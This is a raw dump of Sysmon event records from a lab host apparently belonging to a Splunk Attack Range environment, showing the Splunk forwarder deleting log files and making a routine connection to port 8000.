23542300x800000000000000035064Microsoft-Windows-Sysmon/Operationalwin-dc-725.attackrange.local-2021-03-05 20:03:44.474{CB3070D7-7A3E-6042-E800-00000000AD01}656NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=165E608BB94E36579F2D249810765841,SHA256=941ECD12B978FDED56DE722D78FC377AB61CB2E9FEB07103441F507C035752E7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000035063Microsoft-Windows-Sysmon/Operationalwin-dc-725.attackrange.local-2021-03-05 20:03:44.474{CB3070D7-7A3E-6042-E800-00000000AD01}656NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=147F55121083F778425F69BA674AB312,SHA256=EB9586F9A0267BFBA18B19748E8E242E7CC60A0F5DB93E113816ED02AEDA0DD5,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000035067Microsoft-Windows-Sysmon/Operationalwin-dc-725.attackrange.local-2021-03-05 20:03:41.296{CB3070D7-7A38-6042-DF00-00000000AD01}3888C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-725.attackrange.local61922-false10.0.1.12-8000- 23542300x800000000000000035066Microsoft-Windows-Sysmon/Operationalwin-dc-725.attackrange.local-2021-03-05 20:03:45.060{CB3070D7-7A3E-6042-E800-00000000AD01}656NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6B97E12EF0655FFF50B7D709DB851A65,SHA256=97AB849F0327A028DF677D1B739CE922B98F0072C78A7FD33D7555E7D0A11776,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000035068Microsoft-Windows-Sysmon/Operationalwin-dc-725.attackrange.local-2021-03-05 20:03:46.216{CB3070D7-7A3E-6042-E800-00000000AD01}656NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CFF7977F4C9C1444A8F21FCC5FDDABA5,SHA256=2B4906E513FEB5DBF7046F5AA691E6C562134F5E0DB9BE5CFE1A756C3D4EA365,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000035069Microsoft-Windows-Sysmon/Operationalwin-dc-725.attackrange.local-2021-03-05 20:03:47.366{CB3070D7-7A3E-6042-E800-00000000AD01}656NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6ADD375A331F0794DF1674BE4FD86927,SHA256=64C5D8CBBAB8685A14E64E2ABABE749973C4E16FC4968A472EACD12E37C1579E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000035070Microsoft-Windows-Sysmon/Operationalwin-dc-725.attackrange.local-2021-03-05 20:03:48.537{CB3070D7-7A3E-6042-E800-00000000AD01}656NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=33B6FA5A63B84C7FAB1DD6E65AA9F7D3,SHA256=9039520536091287A5BD7B8FFE658B24FC1738B82C41187CBB08044B9D185041,IMPHASH=00000000000000000000000000000000falsetrue